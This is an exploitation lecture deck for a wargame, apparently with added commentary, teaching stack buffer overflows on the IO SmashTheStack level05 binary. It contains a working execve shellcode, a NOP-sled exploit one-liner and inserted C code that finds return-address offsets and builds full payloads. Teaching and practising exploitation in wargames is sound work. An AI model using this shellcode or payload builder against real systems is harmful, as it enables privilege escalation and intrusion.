Slide 1

Introduction to Exploitation
kelwin, blue-lotus

Slide 2

Basic Goals
• Exploit a basic buffer overflow by yourself
  – Understand basic memory vulnerabilities
  – Basic use of gdb
  – Basic use of shellcode

Slide 3

IO SmashTheStack Level05.c

Slide 4

ELF Format
• Executable and Linkable Format
• 3 main types of object files
  – relocatable file: gcc -c test.c => test.o (several of these archived into test.a)
  – executable file: gcc -o test test.c => test
  – shared object file: test.so
• Parallel views of the same file
  – Linking view: sections, described by the section header table
  – Execution view: segments, described by the program header table

Slide 5

ELF Header

Slide 6

Section Header Table

Slide 7

Program Header Table
gcc -z execstack: marks the PT_GNU_STACK segment executable (RWE instead of RW), so code placed on the stack can run; the stack-based shellcode used in this lecture depends on it.

Slide 8

About Stack
• Region of memory managed with stack discipline
• Grows toward lower addresses
• Register %esp holds the lowest stack address, i.e. the address of the top element
• Stack operations (32-bit)
  – pushl src: %esp = %esp - 4, then src is stored at (%esp)
  – popl dst: dst is loaded from (%esp), then %esp = %esp + 4
[Figure: the stack drawn as a column of bytes; %esp marks the stack top at the lowest address, the stack bottom is at the highest address]

Slide 9

Calling Convention (cdecl)
[Figure: the stack after the caller executes f(1, 2, 3), from high to low addresses: the caller's frame, whose saved %ebp is the %ebp of the caller's caller; the arguments 3, 2, 1, pushed right to left so that 1 sits at the lowest address; the return address pushed by call; and the caller's %ebp saved by the prologue of f, which the new %ebp points to. The caller removes the arguments after f returns.]

Slide 10

Memory Layout (Linux x86)
• Stack
• Shared Libraries
• Heap
• Data (Global/Static)
• Text
[Figure: 32-bit address space from high to low. 0xFFFFFFFF down to 0xC0000000: reserved for the kernel. Just below 0xC0000000: the stack, growing toward lower addresses, with %esp pointing into it. Around 0x40000000: shared libraries. From 0x08048000 upward: text, then data (global/static), then the heap growing toward higher addresses. Below 0x08048000 down to 0x00000000: unused.]

Slide 11

Stack Frame
[Figure: one frame, from high to low addresses: arguments, return address, saved stack frame pointer (the previous %ebp; the current %ebp points here), [exception handlers], local variables, callee-saved registers. %esp points at the low end of the frame. The memory map from the previous slide is shown alongside, placing the frame in the stack region below 0xC0000000.]

Slide 12

objdump -d level05

Slide 13

objdump -d level05
char * strcpy ( char * destination, const char * source );
strcpy copies until the NUL terminator of source and never checks the size of destination; that is what makes the fixed-size stack buffer in level05 overflowable.

Slide 14

objdump -d -j (with -j, only the named section is disassembled)

Slide 15

Buffer Overflow
[Figure: frame of a function taking (int argc, char **argv), from high to low addresses: char **argv, int argc, return address, previous %ebp, char buf[128]. buf sits at the lowest address, directly below the saved %ebp.]

Slide 16

Buffer Overflow
[Figure: the same frame after strcpy writes more than 128 bytes: input bytes 0~127 fill char buf[0~127], bytes 128~131 overwrite the previous %ebp, bytes 132~135 overwrite the return address, and anything beyond that overwrites argc and argv.]
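As an added illustration (the slides show level05.c but this text does not reproduce it), here is a reconstruction of the bug class the frame diagrams describe: a fixed stack buffer filled by an unbounded strcpy, next to a bounded copy that refuses oversized input. The function names, the 128-byte size taken from the frame diagram, and the sample strings are my assumptions, not the real level05.c.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 128   /* size of buf in the frame diagram (assumption for level05) */

/* Assumed reconstruction of the level05-style bug, not the real level05.c:
 * a fixed 128-byte stack buffer filled by an unbounded strcpy. With the
 * 32-bit cdecl frame from the slides, input bytes 0..127 land in buf,
 * 128..131 overwrite the saved %ebp and 132..135 overwrite the return
 * address. Only call it with inputs shorter than BUF_SIZE. */
void vuln_copy(const char *src)
{
    char buf[BUF_SIZE];
    strcpy(buf, src);   /* no length check: writes past buf for strlen(src) >= 128 */
    printf("copied %zu bytes into a %d-byte buffer\n", strlen(buf), BUF_SIZE);
}

/* Hardened form: copy only if the string and its terminator fit.
 * Returns 0 on success and -1 if src is too long (nothing is written). */
int safe_copy(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (dst_size == 0 || n >= dst_size)
        return -1;
    memcpy(dst, src, n + 1);   /* n + 1 includes the NUL terminator */
    return 0;
}

int main(int argc, char **argv)
{
    char dst[BUF_SIZE];
    const char *input = argc > 1 ? argv[1] : "constructed short input";

    if (safe_copy(dst, sizeof dst, input) != 0) {
        fprintf(stderr, "rejected: %zu bytes do not fit in %zu (would reach the saved %%ebp at offset %d)\n",
                strlen(input), sizeof dst, BUF_SIZE);
        return 1;
    }
    printf("safe_copy ok: %s\n", dst);
    vuln_copy(dst);   /* safe here because dst already fits */
    return 0;
}
```

Run it with a 140-character argument and the bounded version rejects the input; the same argument fed to vuln_copy would cross the saved %ebp at offset 128 and the return address at offset 132 exactly as the diagram above shows.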

Slide 17

GDB
• Starting GDB
  – gdb program, then run [arglist]
  – gdb --args program [arglist], then run
  – attach pid
• Stopping GDB
  – quit
  – Ctrl-d

Slide 18

GDB
• Breakpoints and Watchpoints
  – break function
  – break *addr
  – info break
  – clear function
  – delete/enable/disable [n]
  – watch expr
  – info watch

Slide 19

GDB
• Execution Control
  – continue
  – step (one source line, entering calls)
  – stepi (one instruction, entering calls)
  – next (one source line, stepping over calls)
  – nexti (one instruction, stepping over calls)

Slide 20

GDB
• Display
  – print [/f] expr, where f is one of
    • x hex
    • d signed decimal
    • u unsigned decimal
    • o octal
    • t binary
    • a address
    • c character
    • f floating point
  – info reg [rn]

Slide 21

GDB
• Display
  – x [/Nuf] expr
    • N: count of units to display
    • u: unit size
      – b bytes
      – h halfwords (two bytes)
      – w words (four bytes)
      – g giant words (eight bytes)
    • f: printing format (the print formats, plus)
      – s null-terminated string
      – i machine instructions
  – disassem [addr]

Slide 22

GDB
• Demo
  – view arguments and environment variables
  – view the stack structure
  – insert breakpoints and control execution

Slide 23

Buffer Overflow Exploit
[Figure: the frame with buf filled by "evil code" and the return address slot overwritten with the address of that code, so that ret jumps back into the buffer; argc and argv sit above.]
Construct evil buffer: buf = evil_code + evil_code_address

Slide 24

Buffer Overflow Exploit
[Figure: the same idea with filler ("useless buf") around the evil code and the evil code address repeated at the end, so that an inexact guess of the address still lands in the buffer.]
Construct evil buffer: buf = evil_code + evil_code_address

Slide 25

Shellcode
• What is shellcode
  – A small piece of code used as the payload in the exploitation of a software vulnerability
  – Typically it starts a command shell from which the attacker can control the compromised machine
• What we use here
  – The execve system call, to obtain a shell running at the higher privilege level of the vulnerable program

Slide 26

Shellcode
int execve(const char *filename, char *const argv[], char *const envp[]);
• Linux x86 syscall calling convention (int 0x80): %eax = syscall number (0xb for execve), %ebx = filename, %ecx = argv, %edx = envp; %esi, %edi and %ebp carry further arguments for other syscalls
• The string "/bin//sh" is built on the stack by pushing 0, then "//sh", then "/bin", so that %esp then points at the NUL-terminated string; the doubled slash pads the path to exactly 8 bytes so that neither pushed immediate needs a NUL byte
• CLTD (cdq) sign-extends EAX into EDX:EAX; with EAX = 0 it zeroes EDX (envp = NULL) in a single byte

Slide 27

Shellcode

Slide 28

Shellcode
SHELLCODE = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
(24 bytes, none of them 0x00, so strcpy copies the whole payload)
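An added analysis of the 24 shellcode bytes, written for this text and not taken from the slides: it embeds the bytes with their disassembly, checks that no byte is 0x00 (strcpy would stop there), reassembles the "/bin//sh" string from the two push immediates, and contrasts the NUL-free `xor eax,eax; mov al,0xb` with the `mov eax,0xb` encoding that would break the payload. The function names and the MOV_EAX_IMM constant are my own.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The 24-byte execve("/bin//sh") shellcode from the slide, with its
 * disassembly (32-bit Linux, int 0x80 ABI):
 *   31 c0             xor  eax, eax      ; eax = 0 without a 0x00 in the encoding
 *   50                push eax           ; string terminator
 *   68 2f 2f 73 68    push 0x68732f2f    ; "//sh"
 *   68 2f 62 69 6e    push 0x6e69622f    ; "/bin"  -> stack now holds "/bin//sh\0"
 *   89 e3             mov  ebx, esp      ; ebx = filename
 *   50                push eax           ; argv[1] = NULL
 *   53                push ebx           ; argv[0] = filename
 *   89 e1             mov  ecx, esp      ; ecx = argv
 *   99                cdq                ; edx = 0 (sign of eax) -> envp = NULL
 *   b0 0b             mov  al, 0xb       ; __NR_execve
 *   cd 80             int  0x80
 */
static const unsigned char SHELLCODE[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
#define SHELLCODE_LEN (sizeof(SHELLCODE) - 1)   /* drop the literal's own terminator */

/* The naive way to load the syscall number: mov eax, 0xb. Its encoding has
 * three 0x00 bytes, which is why the shellcode uses xor eax,eax + mov al,0xb. */
static const unsigned char MOV_EAX_IMM[] = { 0xb8, 0x0b, 0x00, 0x00, 0x00 };

/* strcpy-delivered payloads stop at the first 0x00, so usable shellcode
 * must be NUL-free. Returns 1 if a NUL byte is present, 0 otherwise. */
int has_nul(const unsigned char *code, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0)
            return 1;
    return 0;
}

/* Decode a `push imm32` (opcode 0x68) at code[off]: copies the 4 immediate
 * bytes into out (plus a terminator) and returns 1, or returns 0 if there is
 * no complete push at that offset. */
int decode_push_imm32(const unsigned char *code, size_t len, size_t off, char out[5])
{
    if (off + 5 > len || code[off] != 0x68)
        return 0;
    memcpy(out, code + off + 1, 4);
    out[4] = '\0';
    return 1;
}

/* Reassemble the string the two pushes build on the stack. The second push
 * lands at the lower address, so it supplies the first four characters. */
int reconstruct_path(const unsigned char *code, size_t len, char out[9])
{
    char first_push[5], second_push[5];
    if (!decode_push_imm32(code, len, 3, first_push) ||
        !decode_push_imm32(code, len, 8, second_push))
        return 0;
    memcpy(out, second_push, 4);      /* "/bin" at the lower address */
    memcpy(out + 4, first_push, 4);   /* "//sh" right above it */
    out[8] = '\0';
    return 1;
}

int main(void)
{
    char path[9];
    printf("shellcode length: %zu, contains NUL: %d\n",
           SHELLCODE_LEN, has_nul(SHELLCODE, SHELLCODE_LEN));
    if (reconstruct_path(SHELLCODE, SHELLCODE_LEN, path))
        printf("string built on the stack: %s\n", path);
    printf("'mov eax, 0xb' contains NUL: %d\n",
           has_nul(MOV_EAX_IMM, sizeof MOV_EAX_IMM));
    return 0;
}
```

The same NUL check should be run on any replacement shellcode and on the return address you append later: one zero byte anywhere truncates what strcpy delivers.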

Slide 29

Exploit
• Construct the attacking buffer
  – buf = NOP + SHELLCODE + RET_ADDRESS
• How to find the return address slot (its offset) and the address to jump to
  – debugging
  – pattern_tool.py from metasploit
    • "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2A"
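The offset-finding and buffer construction from this slide and the next one, as an added C example (not the slides' pattern_tool.py and not the python one-liner): a Metasploit-style pattern_create/pattern_offset and a builder for NOP sled + shellcode + padding + repeated return address. The 132-byte return-address offset is taken from the frame diagrams; the sample address 0xbfffffff, the int3 stand-in shellcode and the function names are my assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PATTERN_MAX (26 * 26 * 10 * 3)   /* 20280: length before the pattern repeats */

/* Metasploit-style cyclic pattern (pattern_create): "Aa0Aa1Aa2...Ab0Ab1...".
 * Each 3-byte group (upper, lower, digit) is unique, so any 4 consecutive
 * bytes pin down one position. Writes up to len bytes plus a terminator into
 * out and returns the number of pattern bytes written. */
size_t pattern_create(char *out, size_t len)
{
    size_t pos = 0;
    for (char u = 'A'; u <= 'Z' && pos < len; u++)
        for (char l = 'a'; l <= 'z' && pos < len; l++)
            for (char d = '0'; d <= '9' && pos < len; d++) {
                const char group[3] = { u, l, d };
                for (int i = 0; i < 3 && pos < len; i++)
                    out[pos++] = group[i];
            }
    out[pos] = '\0';
    return pos;
}

/* pattern_offset: eip is the value gdb shows after the crash; the bytes that
 * overwrote the return address are its little-endian encoding. Returns the
 * offset of those 4 bytes in the pattern, or -1 if not found. */
long pattern_offset(uint32_t eip, size_t pattern_len)
{
    char pat[PATTERN_MAX + 1];
    unsigned char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (unsigned char)(eip >> (8 * i));
    if (pattern_len > PATTERN_MAX)
        pattern_len = PATTERN_MAX;
    size_t n = pattern_create(pat, pattern_len);
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Attacking buffer in the shape of the practice one-liner:
 *   "\x90"*sled_len + SHELLCODE + "\x90"*padding + ret_addr*ret_copies
 * ret_offset is the distance from the start of the buffer to the saved return
 * address (128-byte buf + 4-byte saved %ebp = 132 in the frame diagrams);
 * padding is whatever is left between the shellcode and that slot. ret_addr
 * must point into the NOP sled. Returns the payload length (NUL-terminated
 * for use as a C string) or 0 if it does not fit or would contain a NUL byte,
 * which strcpy delivery cannot carry. */
size_t build_payload(unsigned char *out, size_t out_size,
                     const unsigned char *shellcode, size_t sc_len,
                     size_t sled_len, size_t ret_offset,
                     uint32_t ret_addr, size_t ret_copies)
{
    size_t total = ret_offset + 4 * ret_copies;
    if (ret_copies == 0 || sled_len + sc_len > ret_offset || total + 1 > out_size)
        return 0;
    for (int i = 0; i < 4; i++)
        if (((ret_addr >> (8 * i)) & 0xffu) == 0)
            return 0;                                   /* NUL byte in the address */
    memset(out, 0x90, ret_offset);                      /* sled and trailing padding */
    memcpy(out + sled_len, shellcode, sc_len);          /* shellcode after the sled */
    for (size_t c = 0; c < ret_copies; c++)             /* little-endian return address */
        for (int i = 0; i < 4; i++)
            out[ret_offset + 4 * c + i] = (unsigned char)(ret_addr >> (8 * i));
    out[total] = '\0';
    return total;
}

int main(void)
{
    char pat[201];
    unsigned char payload[256];
    /* constructed stand-in for the real shellcode: four int3 instructions */
    static const unsigned char trap[4] = { 0xcc, 0xcc, 0xcc, 0xcc };

    pattern_create(pat, 200);
    printf("pattern: %s\n", pat);
    printf("EIP 0x41346541 (\"Ae4A\") sits at offset %ld\n", pattern_offset(0x41346541u, 200));

    size_t n = build_payload(payload, sizeof payload, trap, sizeof trap, 50, 132, 0xbfffffffu, 3);
    printf("payload length %zu: sled at 0, shellcode at 50, return addresses from 132\n", n);
    return 0;
}
```

Workflow: feed the pattern as argv[1], read EIP from gdb after the crash, call pattern_offset with that value to get ret_offset, then pick ret_addr somewhere inside the sled (x/64xb $esp in gdb shows where the buffer ended up) and build the real payload with the 24-byte shellcode in place of the int3 stand-in.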

Slide 30

Practice 1
• ssh -p2222 111.111.111.111
• password: bl*******
• capture the level05.flag
• ./level05 $(python -c 'print "\x90"*50 + "\x31….\x80" + "\x90"*n + "\xff\xff\xff\xbf"*m')
  (Python 2 print; "\x31….\x80" stands for the 24-byte SHELLCODE; n and m are the padding and address-repeat counts you have to work out)

Slide 31

More Vulnerabilities
• Heap Overflow
• Integer Overflow
• Format String
• Heap Spray
We Need Your Presentations!

Slide 32

Platform Defenses and More Exploitations
• DEP/W^X
  – Return-to-libc / Return Oriented Programming (ROP)
• ASLR
  – jmp esp / ret2ret / …
Call For Presentations!

Slide 33

How to learn
• CTFs
• Wargames
  – io smash the stack
  – exploit-exercises.com
• Presentations
• Open Courses

Slide 34

RuCTFE 2012
• Call for participants!
• Competition time: November 24, 23:00 to November 25, 07:00
• Rules: two rounds of attack and defense
• Practice session: November 19, 13:00, room 3-230

Slide 35

Practice 2
• ssh -p2222 111.111.111.111
• password: bl*******
• capture the level07.flag